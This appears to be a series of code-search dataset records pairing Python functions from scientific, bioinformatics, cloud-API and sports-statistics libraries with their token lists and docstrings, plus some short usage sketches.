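print(sorted(os.listdir(tmp)))   # ['b.txt'] -- only the .tar was removed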
thunder-project/thunder
thunder/blocks/blocks.py
https://github.com/thunder-project/thunder/blob/967ff8f3e7c2fabe1705743d95eb2746d4329786/thunder/blocks/blocks.py#L89-L102
def toseries(self): """ Converts blocks to series. """ from thunder.series.series import Series if self.mode == 'spark': values = self.values.values_to_keys(tuple(range(1, len(self.shape)))).unchunk() if self.mode == 'local': values = self.values.unchunk() values = rollaxis(values, 0, values.ndim) return Series(values)
[ "def", "toseries", "(", "self", ")", ":", "from", "thunder", ".", "series", ".", "series", "import", "Series", "if", "self", ".", "mode", "==", "'spark'", ":", "values", "=", "self", ".", "values", ".", "values_to_keys", "(", "tuple", "(", "range", "(", "1", ",", "len", "(", "self", ".", "shape", ")", ")", ")", ")", ".", "unchunk", "(", ")", "if", "self", ".", "mode", "==", "'local'", ":", "values", "=", "self", ".", "values", ".", "unchunk", "(", ")", "values", "=", "rollaxis", "(", "values", ",", "0", ",", "values", ".", "ndim", ")", "return", "Series", "(", "values", ")" ]
Converts blocks to series.
[ "Converts", "blocks", "to", "series", "." ]
python
train
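A hedged usage sketch using thunder's random image generator; the chunk size is illustrative and the toblocks keyword may differ between thunder versions.

import thunder as td

images = td.images.fromrandom(shape=(10, 50, 50))
series = images.toblocks(chunk_size=(25, 25)).toseries()
print(series.shape)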
bcbio/bcbio-nextgen
bcbio/ngsalign/alignprep.py
https://github.com/bcbio/bcbio-nextgen/blob/6a9348c0054ccd5baffd22f1bb7d0422f6978b20/bcbio/ngsalign/alignprep.py#L64-L101
def _set_align_split_size(data):
    """Set useful align_split_size, generating an estimate if it doesn't exist.

    We try to split on larger inputs and avoid too many pieces, aiming for size
    chunks of 5Gb or at most 100 splits.

    The size estimate used in calculations is 20 million reads for ~5Gb.

    For UMI calculations we skip splitting since we're going to align and
    re-align after consensus.

    For CWL runs, we pick larger split sizes to avoid overhead of staging each chunk.
    """
    if cwlutils.is_cwl_run(data):
        target_size = 20  # Gb
        target_size_reads = 80  # million reads
    else:
        target_size = 5  # Gb
        target_size_reads = 20  # million reads
    max_splits = 100  # Avoid too many pieces, causing merge memory problems
    val = dd.get_align_split_size(data)
    umi_consensus = dd.get_umi_consensus(data)
    if val is None:
        if not umi_consensus:
            total_size = 0  # Gb
            # Use original files if we might have reduced the size of our prepped files
            input_files = data.get("files_orig", []) if dd.get_save_diskspace(data) else data.get("files", [])
            for fname in input_files:
                if os.path.exists(fname):
                    total_size += os.path.getsize(fname) / (1024.0 * 1024.0 * 1024.0)
            # Only set if we have files and are bigger than the target size
            if total_size > target_size:
                data["config"]["algorithm"]["align_split_size"] = \
                    int(1e6 * _pick_align_split_size(total_size, target_size,
                                                     target_size_reads, max_splits))
    elif val:
        assert not umi_consensus, "Cannot set align_split_size to %s with UMI conensus specified" % val
    return data
[ "def", "_set_align_split_size", "(", "data", ")", ":", "if", "cwlutils", ".", "is_cwl_run", "(", "data", ")", ":", "target_size", "=", "20", "# Gb", "target_size_reads", "=", "80", "# million reads", "else", ":", "target_size", "=", "5", "# Gb", "target_size_reads", "=", "20", "# million reads", "max_splits", "=", "100", "# Avoid too many pieces, causing merge memory problems", "val", "=", "dd", ".", "get_align_split_size", "(", "data", ")", "umi_consensus", "=", "dd", ".", "get_umi_consensus", "(", "data", ")", "if", "val", "is", "None", ":", "if", "not", "umi_consensus", ":", "total_size", "=", "0", "# Gb", "# Use original files if we might have reduced the size of our prepped files", "input_files", "=", "data", ".", "get", "(", "\"files_orig\"", ",", "[", "]", ")", "if", "dd", ".", "get_save_diskspace", "(", "data", ")", "else", "data", ".", "get", "(", "\"files\"", ",", "[", "]", ")", "for", "fname", "in", "input_files", ":", "if", "os", ".", "path", ".", "exists", "(", "fname", ")", ":", "total_size", "+=", "os", ".", "path", ".", "getsize", "(", "fname", ")", "/", "(", "1024.0", "*", "1024.0", "*", "1024.0", ")", "# Only set if we have files and are bigger than the target size", "if", "total_size", ">", "target_size", ":", "data", "[", "\"config\"", "]", "[", "\"algorithm\"", "]", "[", "\"align_split_size\"", "]", "=", "int", "(", "1e6", "*", "_pick_align_split_size", "(", "total_size", ",", "target_size", ",", "target_size_reads", ",", "max_splits", ")", ")", "elif", "val", ":", "assert", "not", "umi_consensus", ",", "\"Cannot set align_split_size to %s with UMI conensus specified\"", "%", "val", "return", "data" ]
Set useful align_split_size, generating an estimate if it doesn't exist.

    We try to split on larger inputs and avoid too many pieces, aiming for size
    chunks of 5Gb or at most 100 splits.

    The size estimate used in calculations is 20 million reads for ~5Gb.

    For UMI calculations we skip splitting since we're going to align and
    re-align after consensus.

    For CWL runs, we pick larger split sizes to avoid overhead of staging each chunk.
[ "Set", "useful", "align_split_size", "generating", "an", "estimate", "if", "it", "doesn", "t", "exist", "." ]
python
train
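The gating arithmetic above in isolation, with hypothetical file sizes: bytes accumulate as gigabytes, and a split size is only configured once the total passes the target.

sizes_bytes = [3500000000, 4200000000]         # hypothetical prepped fastq sizes
total_size = sum(sizes_bytes) / (1024.0 ** 3)  # ~7.2 Gb
target_size = 5                                # Gb, the non-CWL default above
print(total_size > target_size)                # True -> align_split_size gets set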
KarchinLab/probabilistic2020
prob2020/python/permutation.py
https://github.com/KarchinLab/probabilistic2020/blob/5d70583b0a7c07cfe32e95f3a70e05df412acb84/prob2020/python/permutation.py#L210-L357
def hotmaps_permutation(obs_stat, context_counts, context_to_mut,
                        seq_context, gene_seq, window,
                        num_permutations=10000,
                        stop_criteria=100,
                        max_batch=25000,
                        null_save_path=None):
    """Performs null-permutations for position-based mutation statistics
    in a single gene.

    Parameters
    ----------
    obs_stat : dict
        dictionary mapping codons to the sum of mutations in a window
    context_counts : pd.Series
        number of mutations for each context
    context_to_mut : dict
        dictionary mapping nucleotide context to a list of observed
        somatic base changes.
    seq_context : SequenceContext
        Sequence context for the entire gene sequence (regardless of where
        mutations occur). The nucleotide contexts are identified at
        positions along the gene.
    gene_seq : GeneSequence
        Sequence of gene of interest
    window : int
        Number of codons to the left/right of a mutated position to
        consider in the window
    num_permutations : int, default: 10000
        number of permutations to create for null
    stop_criteria : int
        stop after stop_criteria iterations are more significant than
        the observed statistic.
    max_batch : int
        maximum number of whole gene simulations to do at once. For large
        number of simulations holding a matrix of M x N, where M is the
        number of mutations and N is the number of simulations, can get
        quite large.
    null_save_path : str or None
        File path to save null distribution. If None, don't save it.

    Returns
    -------
    pvals : dict
        Maps mutated codon position to the calculated p-value
    """
    # get contexts and somatic base
    mycontexts = context_counts.index.tolist()
    somatic_base = [base
                    for one_context in mycontexts
                    for base in context_to_mut[one_context]]

    # calculate the # of batches for simulations
    max_batch = min(num_permutations, max_batch)
    num_batches = num_permutations // max_batch
    remainder = num_permutations % max_batch
    batch_sizes = [max_batch] * num_batches
    if remainder:
        batch_sizes += [remainder]

    # figure out which position has highest value
    max_key = {w: max(obs_stat[w], key=(lambda key: obs_stat[w][key]))
               for w in window}

    # setup null dist counts
    null_cts = {w: {k: 0 for k in obs_stat[w]}
                for w in window}

    # empirical null distribution (saved if file path provided)
    empirical_null = {w: {} for w in window}

    num_sim = 0  # number of simulations
    for j, batch_size in enumerate(batch_sizes):
        # stop iterations if reached sufficient precision
        stop_flag = [(null_cts[w][max_key[w]] >= stop_criteria) for w in window]
        if all(stop_flag):
            break
        #if null_cts[max_key] >= stop_criteria:
            #break

        # get random positions determined by sequence context
        tmp_contxt_pos = seq_context.random_pos(context_counts.iteritems(),
                                                batch_size)
        tmp_mut_pos = np.hstack(pos_array for base, pos_array in tmp_contxt_pos)

        # calculate position-based statistics as a result of random positions
        for i, row in enumerate(tmp_mut_pos):
            # get info about mutations
            tmp_mut_info = mc.get_aa_mut_info(row, somatic_base, gene_seq)

            # calculate position info
            tmp_pos, tmp_sim = utils.calc_windowed_sum(tmp_mut_info['Codon Pos'],
                                                       tmp_mut_info['Reference AA'],
                                                       tmp_mut_info['Somatic AA'],
                                                       window)

            # update the counts when the empirical null passes the observed
            for tmp_w in tmp_sim:
                for tmp_key in tmp_sim[tmp_w]:
                    # get mutation count for simulation
                    val = tmp_sim[tmp_w][tmp_key]
                    # add to empirical null distribution
                    empirical_null[tmp_w].setdefault(val, 0)
                    empirical_null[tmp_w][val] += 1
                    # update counts used for p-value
                    for key in null_cts[tmp_w]:
                        if val >= obs_stat[tmp_w][key]:
                            null_cts[tmp_w][key] += 1

        # update the number of simulations
        num_sim += len(tmp_pos)

        # stop iterations if reached sufficient precision
        stop_flag = [(null_cts[w][max_key[w]] >= stop_criteria) for w in window]
        if all(stop_flag):
            break

    # calculate p-value from empirical null-distribution
    pvals = {w: {k: float(null_cts[w][k]) / (num_sim)
                 for k in obs_stat[w]}
             for w in window}

    # save empirical distribution
    if null_save_path:
        for w in window:
            # create null distribution
            output = [['mutation_count', 'p-value']]
            sorted_cts = sorted(empirical_null[w].keys())
            tmp_sum = 0
            for i in range(len(sorted_cts)):
                tmp_sum += empirical_null[w][sorted_cts[-(i+1)]]
                tmp_pval = tmp_sum / float(num_sim)
                output.append([sorted_cts[-(i+1)], tmp_pval])
            # save output
            with open(null_save_path.format(w), 'w') as handle:
                mywriter = csv.writer(handle, delimiter='\t', lineterminator='\n')
                mywriter.writerows(output)
    return pvals
[ "def", "hotmaps_permutation", "(", "obs_stat", ",", "context_counts", ",", "context_to_mut", ",", "seq_context", ",", "gene_seq", ",", "window", ",", "num_permutations", "=", "10000", ",", "stop_criteria", "=", "100", ",", "max_batch", "=", "25000", ",", "null_save_path", "=", "None", ")", ":", "# get contexts and somatic base", "mycontexts", "=", "context_counts", ".", "index", ".", "tolist", "(", ")", "somatic_base", "=", "[", "base", "for", "one_context", "in", "mycontexts", "for", "base", "in", "context_to_mut", "[", "one_context", "]", "]", "# calculate the # of batches for simulations", "max_batch", "=", "min", "(", "num_permutations", ",", "max_batch", ")", "num_batches", "=", "num_permutations", "//", "max_batch", "remainder", "=", "num_permutations", "%", "max_batch", "batch_sizes", "=", "[", "max_batch", "]", "*", "num_batches", "if", "remainder", ":", "batch_sizes", "+=", "[", "remainder", "]", "# figure out which position has highest value", "max_key", "=", "{", "w", ":", "max", "(", "obs_stat", "[", "w", "]", ",", "key", "=", "(", "lambda", "key", ":", "obs_stat", "[", "w", "]", "[", "key", "]", ")", ")", "for", "w", "in", "window", "}", "# setup null dist counts", "null_cts", "=", "{", "w", ":", "{", "k", ":", "0", "for", "k", "in", "obs_stat", "[", "w", "]", "}", "for", "w", "in", "window", "}", "# empirical null distribution (saved if file path provided)", "empirical_null", "=", "{", "w", ":", "{", "}", "for", "w", "in", "window", "}", "num_sim", "=", "0", "# number of simulations", "for", "j", ",", "batch_size", "in", "enumerate", "(", "batch_sizes", ")", ":", "# stop iterations if reached sufficient precision", "# stop iterations if reached sufficient precision", "stop_flag", "=", "[", "(", "null_cts", "[", "w", "]", "[", "max_key", "[", "w", "]", "]", ">=", "stop_criteria", ")", "for", "w", "in", "window", "]", "if", "all", "(", "stop_flag", ")", ":", "break", "#if null_cts[max_key] >= stop_criteria:", "#break", "# get random positions determined by sequence context", "tmp_contxt_pos", "=", "seq_context", ".", "random_pos", "(", "context_counts", ".", "iteritems", "(", ")", ",", "batch_size", ")", "tmp_mut_pos", "=", "np", ".", "hstack", "(", "pos_array", "for", "base", ",", "pos_array", "in", "tmp_contxt_pos", ")", "# calculate position-based statistics as a result of random positions", "for", "i", ",", "row", "in", "enumerate", "(", "tmp_mut_pos", ")", ":", "# get info about mutations", "tmp_mut_info", "=", "mc", ".", "get_aa_mut_info", "(", "row", ",", "somatic_base", ",", "gene_seq", ")", "# calculate position info", "tmp_pos", ",", "tmp_sim", "=", "utils", ".", "calc_windowed_sum", "(", "tmp_mut_info", "[", "'Codon Pos'", "]", ",", "tmp_mut_info", "[", "'Reference AA'", "]", ",", "tmp_mut_info", "[", "'Somatic AA'", "]", ",", "window", ")", "# update the counts when the empirical null passes the observed", "for", "tmp_w", "in", "tmp_sim", ":", "for", "tmp_key", "in", "tmp_sim", "[", "tmp_w", "]", ":", "# get mutation count for simulation", "val", "=", "tmp_sim", "[", "tmp_w", "]", "[", "tmp_key", "]", "# add to empirical null distribution", "empirical_null", "[", "tmp_w", "]", ".", "setdefault", "(", "val", ",", "0", ")", "empirical_null", "[", "tmp_w", "]", "[", "val", "]", "+=", "1", "# update counts used for p-value", "for", "key", "in", "null_cts", "[", "tmp_w", "]", ":", "if", "val", ">=", "obs_stat", "[", "tmp_w", "]", "[", "key", "]", ":", "null_cts", "[", "tmp_w", "]", "[", "key", "]", "+=", "1", "# update the number of simulations", "num_sim", "+=", 
"len", "(", "tmp_pos", ")", "# stop iterations if reached sufficient precision", "stop_flag", "=", "[", "(", "null_cts", "[", "w", "]", "[", "max_key", "[", "w", "]", "]", ">=", "stop_criteria", ")", "for", "w", "in", "window", "]", "if", "all", "(", "stop_flag", ")", ":", "break", "# calculate p-value from empirical null-distribution", "pvals", "=", "{", "w", ":", "{", "k", ":", "float", "(", "null_cts", "[", "w", "]", "[", "k", "]", ")", "/", "(", "num_sim", ")", "for", "k", "in", "obs_stat", "[", "w", "]", "}", "for", "w", "in", "window", "}", "# save empirical distribution", "if", "null_save_path", ":", "for", "w", "in", "window", ":", "# create null distribution", "output", "=", "[", "[", "'mutation_count'", ",", "'p-value'", "]", "]", "sorted_cts", "=", "sorted", "(", "empirical_null", "[", "w", "]", ".", "keys", "(", ")", ")", "tmp_sum", "=", "0", "for", "i", "in", "range", "(", "len", "(", "sorted_cts", ")", ")", ":", "tmp_sum", "+=", "empirical_null", "[", "w", "]", "[", "sorted_cts", "[", "-", "(", "i", "+", "1", ")", "]", "]", "tmp_pval", "=", "tmp_sum", "/", "float", "(", "num_sim", ")", "output", ".", "append", "(", "[", "sorted_cts", "[", "-", "(", "i", "+", "1", ")", "]", ",", "tmp_pval", "]", ")", "# save output", "with", "open", "(", "null_save_path", ".", "format", "(", "w", ")", ",", "'w'", ")", "as", "handle", ":", "mywriter", "=", "csv", ".", "writer", "(", "handle", ",", "delimiter", "=", "'\\t'", ",", "lineterminator", "=", "'\\n'", ")", "mywriter", ".", "writerows", "(", "output", ")", "return", "pvals" ]
Performs null-permutations for position-based mutation statistics
    in a single gene.

    Parameters
    ----------
    obs_stat : dict
        dictionary mapping codons to the sum of mutations in a window
    context_counts : pd.Series
        number of mutations for each context
    context_to_mut : dict
        dictionary mapping nucleotide context to a list of observed
        somatic base changes.
    seq_context : SequenceContext
        Sequence context for the entire gene sequence (regardless of where
        mutations occur). The nucleotide contexts are identified at
        positions along the gene.
    gene_seq : GeneSequence
        Sequence of gene of interest
    window : int
        Number of codons to the left/right of a mutated position to
        consider in the window
    num_permutations : int, default: 10000
        number of permutations to create for null
    stop_criteria : int
        stop after stop_criteria iterations are more significant than
        the observed statistic.
    max_batch : int
        maximum number of whole gene simulations to do at once. For large
        number of simulations holding a matrix of M x N, where M is the
        number of mutations and N is the number of simulations, can get
        quite large.
    null_save_path : str or None
        File path to save null distribution. If None, don't save it.

    Returns
    -------
    pvals : dict
        Maps mutated codon position to the calculated p-value
[ "Performs", "null", "-", "permutations", "for", "position", "-", "based", "mutation", "statistics", "in", "a", "single", "gene", "." ]
python
train
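The p-value arithmetic at the core of the permutation scheme, reduced to a self-contained sketch: count how often the null statistic is at least as extreme as the observed one. The values are hypothetical.

null_values = [3, 1, 4, 2, 5, 2, 3, 1, 0, 4]   # hypothetical null statistics
observed = 4
pval = sum(v >= observed for v in null_values) / float(len(null_values))
print(pval)                                     # 0.3 -- three values are >= 4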
markovmodel/PyEMMA
pyemma/coordinates/data/util/traj_info_backends.py
https://github.com/markovmodel/PyEMMA/blob/5c3124398217de05ba5ce9c8fb01519222481ab8/pyemma/coordinates/data/util/traj_info_backends.py#L234-L257
def _database_from_key(self, key): """ gets the database name for the given key. Should ensure a uniform spread of keys over the databases in order to minimize waiting times. Since the database has to be locked for updates and multiple processes want to write, each process has to wait until the lock has been released. By default the LRU databases will be stored in a sub directory "traj_info_usage" lying next to the main database. :param key: hash of the TrajInfo instance :return: str, database path """ if not self.filename: return None from pyemma.util.files import mkdir_p hash_value_long = int(key, 16) # bin hash to one of either 10 different databases # TODO: make a configuration parameter out of this number db_name = str(hash_value_long)[-1] + '.db' directory = os.path.dirname(self.filename) + os.path.sep + 'traj_info_usage' mkdir_p(directory) return os.path.join(directory, db_name)
[ "def", "_database_from_key", "(", "self", ",", "key", ")", ":", "if", "not", "self", ".", "filename", ":", "return", "None", "from", "pyemma", ".", "util", ".", "files", "import", "mkdir_p", "hash_value_long", "=", "int", "(", "key", ",", "16", ")", "# bin hash to one of either 10 different databases", "# TODO: make a configuration parameter out of this number", "db_name", "=", "str", "(", "hash_value_long", ")", "[", "-", "1", "]", "+", "'.db'", "directory", "=", "os", ".", "path", ".", "dirname", "(", "self", ".", "filename", ")", "+", "os", ".", "path", ".", "sep", "+", "'traj_info_usage'", "mkdir_p", "(", "directory", ")", "return", "os", ".", "path", ".", "join", "(", "directory", ",", "db_name", ")" ]
gets the database name for the given key. Should ensure a uniform spread of keys over the databases in order to minimize waiting times. Since the database has to be locked for updates and multiple processes want to write, each process has to wait until the lock has been released. By default the LRU databases will be stored in a sub directory "traj_info_usage" lying next to the main database. :param key: hash of the TrajInfo instance :return: str, database path
[ "gets", "the", "database", "name", "for", "the", "given", "key", ".", "Should", "ensure", "a", "uniform", "spread", "of", "keys", "over", "the", "databases", "in", "order", "to", "minimize", "waiting", "times", ".", "Since", "the", "database", "has", "to", "be", "locked", "for", "updates", "and", "multiple", "processes", "want", "to", "write", "each", "process", "has", "to", "wait", "until", "the", "lock", "has", "been", "released", "." ]
python
train
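A self-contained sketch of the sharding rule above: the hex key widens to an integer whose last decimal digit selects one of ten shard files, so concurrent writers mostly contend on different locks. The key here is a stand-in for a TrajInfo hash.

import hashlib

key = hashlib.md5(b'/data/traj_0001.xtc').hexdigest()  # stand-in hash
db_name = str(int(key, 16))[-1] + '.db'
print(db_name)                                         # one of '0.db' ... '9.db'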
jwodder/doapi
doapi/doapi.py
https://github.com/jwodder/doapi/blob/b1306de86a01d8ae7b9c1fe2699765bb82e4f310/doapi/doapi.py#L955-L1025
def _wait(self, objects, attr, value, wait_interval=None, wait_time=None): r""" Calls the ``fetch`` method of each object in ``objects`` periodically until the ``attr`` attribute of each one equals ``value``, yielding the final state of each object as soon as it satisfies the condition. If ``wait_time`` is exceeded, a `WaitTimeoutError` (containing any remaining in-progress objects) is raised. If a `KeyboardInterrupt` is caught, any remaining objects are returned immediately without waiting for completion. .. versionchanged:: 0.2.0 Raises `WaitTimeoutError` on timeout :param iterable objects: an iterable of `Resource`\ s with ``fetch`` methods :param string attr: the attribute to watch :param value: the value of ``attr`` to wait for :param number wait_interval: how many seconds to sleep between requests; defaults to :attr:`wait_interval` if not specified or `None` :param number wait_time: the total number of seconds after which the method will raise an error if any objects have not yet completed, or a negative number to wait indefinitely; defaults to :attr:`wait_time` if not specified or `None` :rtype: generator :raises DOAPIError: if the API endpoint replies with an error :raises WaitTimeoutError: if ``wait_time`` is exceeded """ objects = list(objects) if not objects: return if wait_interval is None: wait_interval = self.wait_interval if wait_time < 0: end_time = None else: if wait_time is None: wait_time = self.wait_time if wait_time is None or wait_time < 0: end_time = None else: end_time = time() + wait_time while end_time is None or time() < end_time: loop_start = time() next_objs = [] for o in objects: obj = o.fetch() if getattr(obj, attr, None) == value: yield obj else: next_objs.append(obj) objects = next_objs if not objects: break loop_end = time() time_left = wait_interval - (loop_end - loop_start) if end_time is not None: time_left = min(time_left, end_time - loop_end) if time_left > 0: try: sleep(time_left) except KeyboardInterrupt: for o in objects: yield o return if objects: raise WaitTimeoutError(objects, attr, value, wait_interval, wait_time)
[ "def", "_wait", "(", "self", ",", "objects", ",", "attr", ",", "value", ",", "wait_interval", "=", "None", ",", "wait_time", "=", "None", ")", ":", "objects", "=", "list", "(", "objects", ")", "if", "not", "objects", ":", "return", "if", "wait_interval", "is", "None", ":", "wait_interval", "=", "self", ".", "wait_interval", "if", "wait_time", "<", "0", ":", "end_time", "=", "None", "else", ":", "if", "wait_time", "is", "None", ":", "wait_time", "=", "self", ".", "wait_time", "if", "wait_time", "is", "None", "or", "wait_time", "<", "0", ":", "end_time", "=", "None", "else", ":", "end_time", "=", "time", "(", ")", "+", "wait_time", "while", "end_time", "is", "None", "or", "time", "(", ")", "<", "end_time", ":", "loop_start", "=", "time", "(", ")", "next_objs", "=", "[", "]", "for", "o", "in", "objects", ":", "obj", "=", "o", ".", "fetch", "(", ")", "if", "getattr", "(", "obj", ",", "attr", ",", "None", ")", "==", "value", ":", "yield", "obj", "else", ":", "next_objs", ".", "append", "(", "obj", ")", "objects", "=", "next_objs", "if", "not", "objects", ":", "break", "loop_end", "=", "time", "(", ")", "time_left", "=", "wait_interval", "-", "(", "loop_end", "-", "loop_start", ")", "if", "end_time", "is", "not", "None", ":", "time_left", "=", "min", "(", "time_left", ",", "end_time", "-", "loop_end", ")", "if", "time_left", ">", "0", ":", "try", ":", "sleep", "(", "time_left", ")", "except", "KeyboardInterrupt", ":", "for", "o", "in", "objects", ":", "yield", "o", "return", "if", "objects", ":", "raise", "WaitTimeoutError", "(", "objects", ",", "attr", ",", "value", ",", "wait_interval", ",", "wait_time", ")" ]
r""" Calls the ``fetch`` method of each object in ``objects`` periodically until the ``attr`` attribute of each one equals ``value``, yielding the final state of each object as soon as it satisfies the condition. If ``wait_time`` is exceeded, a `WaitTimeoutError` (containing any remaining in-progress objects) is raised. If a `KeyboardInterrupt` is caught, any remaining objects are returned immediately without waiting for completion. .. versionchanged:: 0.2.0 Raises `WaitTimeoutError` on timeout :param iterable objects: an iterable of `Resource`\ s with ``fetch`` methods :param string attr: the attribute to watch :param value: the value of ``attr`` to wait for :param number wait_interval: how many seconds to sleep between requests; defaults to :attr:`wait_interval` if not specified or `None` :param number wait_time: the total number of seconds after which the method will raise an error if any objects have not yet completed, or a negative number to wait indefinitely; defaults to :attr:`wait_time` if not specified or `None` :rtype: generator :raises DOAPIError: if the API endpoint replies with an error :raises WaitTimeoutError: if ``wait_time`` is exceeded
[ "r", "Calls", "the", "fetch", "method", "of", "each", "object", "in", "objects", "periodically", "until", "the", "attr", "attribute", "of", "each", "one", "equals", "value", "yielding", "the", "final", "state", "of", "each", "object", "as", "soon", "as", "it", "satisfies", "the", "condition", "." ]
python
train
borntyping/python-riemann-client
riemann_client/command.py
https://github.com/borntyping/python-riemann-client/blob/3e181d90bdf685afd21c1ec5ee20e6840b011ea5/riemann_client/command.py#L57-L81
def main(ctx, host, port, transport_type, timeout, ca_certs): """Connects to a Riemann server to send events or query the index By default, will attempt to contact Riemann on localhost:5555 over TCP. The RIEMANN_HOST and RIEMANN_PORT environment variables can be used to configure the host and port used. Command line parameters will override the environment variables. Use `-T none` to test commands without actually connecting to a server. """ if transport_type == 'udp': if timeout is not None: ctx.fail('--timeout cannot be used with the UDP transport') transport = riemann_client.transport.UDPTransport(host, port) elif transport_type == 'tcp': transport = riemann_client.transport.TCPTransport(host, port, timeout) elif transport_type == 'tls': if ca_certs is None: ctx.fail('--ca-certs must be set when using the TLS transport') transport = riemann_client.transport.TLSTransport( host, port, timeout, ca_certs) elif transport_type == 'none': transport = riemann_client.transport.BlankTransport() ctx.obj = transport
[ "def", "main", "(", "ctx", ",", "host", ",", "port", ",", "transport_type", ",", "timeout", ",", "ca_certs", ")", ":", "if", "transport_type", "==", "'udp'", ":", "if", "timeout", "is", "not", "None", ":", "ctx", ".", "fail", "(", "'--timeout cannot be used with the UDP transport'", ")", "transport", "=", "riemann_client", ".", "transport", ".", "UDPTransport", "(", "host", ",", "port", ")", "elif", "transport_type", "==", "'tcp'", ":", "transport", "=", "riemann_client", ".", "transport", ".", "TCPTransport", "(", "host", ",", "port", ",", "timeout", ")", "elif", "transport_type", "==", "'tls'", ":", "if", "ca_certs", "is", "None", ":", "ctx", ".", "fail", "(", "'--ca-certs must be set when using the TLS transport'", ")", "transport", "=", "riemann_client", ".", "transport", ".", "TLSTransport", "(", "host", ",", "port", ",", "timeout", ",", "ca_certs", ")", "elif", "transport_type", "==", "'none'", ":", "transport", "=", "riemann_client", ".", "transport", ".", "BlankTransport", "(", ")", "ctx", ".", "obj", "=", "transport" ]
Connects to a Riemann server to send events or query the index By default, will attempt to contact Riemann on localhost:5555 over TCP. The RIEMANN_HOST and RIEMANN_PORT environment variables can be used to configure the host and port used. Command line parameters will override the environment variables. Use `-T none` to test commands without actually connecting to a server.
[ "Connects", "to", "a", "Riemann", "server", "to", "send", "events", "or", "query", "the", "index" ]
python
train
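Driving the click group in-process with click's test runner, using the -T none transport that the docstring recommends for dry runs; the send subcommand name follows the docstring's description of the tool and is otherwise an assumption.

from click.testing import CliRunner
from riemann_client.command import main

result = CliRunner().invoke(main, ['-T', 'none', 'send'])
print(result.exit_code, result.output)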
ktdreyer/txkoji
txkoji/connection.py
https://github.com/ktdreyer/txkoji/blob/a7de380f29f745bf11730b27217208f6d4da7733/txkoji/connection.py#L393-L406
def listChannels(self, **kwargs): """ Get information about all Koji channels. :param **kwargs: keyword args to pass through to listChannels RPC. :returns: deferred that when fired returns a list of Channel objects. """ data = yield self.call('listChannels', **kwargs) channels = [] for cdata in data: channel = Channel.fromDict(cdata) channel.connection = self channels.append(channel) defer.returnValue(channels)
[ "def", "listChannels", "(", "self", ",", "*", "*", "kwargs", ")", ":", "data", "=", "yield", "self", ".", "call", "(", "'listChannels'", ",", "*", "*", "kwargs", ")", "channels", "=", "[", "]", "for", "cdata", "in", "data", ":", "channel", "=", "Channel", ".", "fromDict", "(", "cdata", ")", "channel", ".", "connection", "=", "self", "channels", ".", "append", "(", "channel", ")", "defer", ".", "returnValue", "(", "channels", ")" ]
Get information about all Koji channels. :param **kwargs: keyword args to pass through to listChannels RPC. :returns: deferred that when fired returns a list of Channel objects.
[ "Get", "information", "about", "all", "Koji", "channels", "." ]
python
train
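A hedged Twisted-style usage sketch; the 'brew' profile name mirrors txkoji's examples and is an assumption, as is the name attribute on the returned Channel objects.

from twisted.internet import defer, task
from txkoji import Connection

@defer.inlineCallbacks
def show_channels(reactor):
    koji = Connection('brew')
    channels = yield koji.listChannels()
    for channel in channels:
        print(channel.name)        # attribute assumed from the RPC dict

task.react(show_channels)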
marcocamma/datastorage
datastorage/datastorage.py
https://github.com/marcocamma/datastorage/blob/d88cdc08414c1c99d34d62e65fcbf807c3088a37/datastorage/datastorage.py#L233-L254
def save(fname, d, link_copy=True, raiseError=False):
    """ link_copy is used by hdf5 saving only, it allows creating links to identical arrays (saving space) """
    # make sure the object is dict (recursively) this allows reading it
    # without the DataStorage module
    fname = pathlib.Path(fname)
    d = toDict(d, recursive=True)
    d['filename'] = str(fname)
    extension = fname.suffix
    log.info("Saving storage file %s" % fname)
    try:
        if extension == ".npz":
            return dictToNpz(fname, d)
        elif extension == ".h5":
            return dictToH5(fname, d, link_copy=link_copy)
        elif extension == ".npy":
            return dictToNpy(fname, d)
        else:
            raise ValueError(
                "Extension must be h5, npy or npz, it was %s" % extension)
    except Exception as e:
        log.exception("Could not save %s" % fname)
        if raiseError:
            raise e
[ "def", "save", "(", "fname", ",", "d", ",", "link_copy", "=", "True", ",", "raiseError", "=", "False", ")", ":", "# make sure the object is dict (recursively) this allows reading it", "# without the DataStorage module", "fname", "=", "pathlib", ".", "Path", "(", "fname", ")", "d", "=", "toDict", "(", "d", ",", "recursive", "=", "True", ")", "d", "[", "'filename'", "]", "=", "str", "(", "fname", ")", "extension", "=", "fname", ".", "suffix", "log", ".", "info", "(", "\"Saving storage file %s\"", "%", "fname", ")", "try", ":", "if", "extension", "==", "\".npz\"", ":", "return", "dictToNpz", "(", "fname", ",", "d", ")", "elif", "extension", "==", "\".h5\"", ":", "return", "dictToH5", "(", "fname", ",", "d", ",", "link_copy", "=", "link_copy", ")", "elif", "extension", "==", "\".npy\"", ":", "return", "dictToNpy", "(", "fname", ",", "d", ")", "else", ":", "raise", "ValueError", "(", "\"Extension must be h5, npy or npz, it was %s\"", "%", "extension", ")", "except", "Exception", "as", "e", ":", "log", ".", "exception", "(", "\"Could not save %s\"", "%", "fname", ")", "if", "raiseError", ":", "raise", "e" ]
link_copy is used by hdf5 saving only, it allows creating links to identical arrays (saving space)
[ "link_copy", "is", "used", "by", "hdf5", "saving", "only", "it", "allows", "to", "creat", "link", "of", "identical", "arrays", "(", "saving", "space", ")" ]
python
train
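A short usage sketch for save() above: the file names are illustrative, and it assumes the datastorage package is importable. With link_copy=True (the default), identical arrays in an HDF5 file are stored once and linked.

import numpy as np
from datastorage.datastorage import save

arr = np.arange(10)
data = dict(motor=arr, motor_copy=arr, meta=dict(sample='test'))
save('run001.h5', data)    # the extension selects the writer (.h5/.npy/.npz)
save('run001.npz', data)   # link_copy only matters for the .h5 branch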
roclark/sportsreference
sportsreference/nba/roster.py
https://github.com/roclark/sportsreference/blob/ea0bae432be76450e137671d2998eb38f962dffd/sportsreference/nba/roster.py#L442-L468
def _parse_contract(self, player_info):
    """
    Parse the player's contract.

    Depending on the player's contract status, a contract table is
    located at the bottom of the stats page and includes player wages by
    season. If found, create a dictionary housing the wages by season.

    Parameters
    ----------
    player_info : PyQuery object
        A PyQuery object containing the HTML from the player's stats
        page.
    """
    tables = player_info('table').items()
    for table in tables:
        id_attr = table.attr('id')
        if id_attr:
            if id_attr.startswith('contracts_'):
                years = self._parse_contract_headers(table)
                wages = self._parse_contract_wages(table)
                contract = self._combine_contract(years, wages)
                # If the contract is empty, the player likely doesn't have
                # a contract and should have a value of None instead.
                if contract == {}:
                    contract = None
                setattr(self, '_contract', contract)
                break
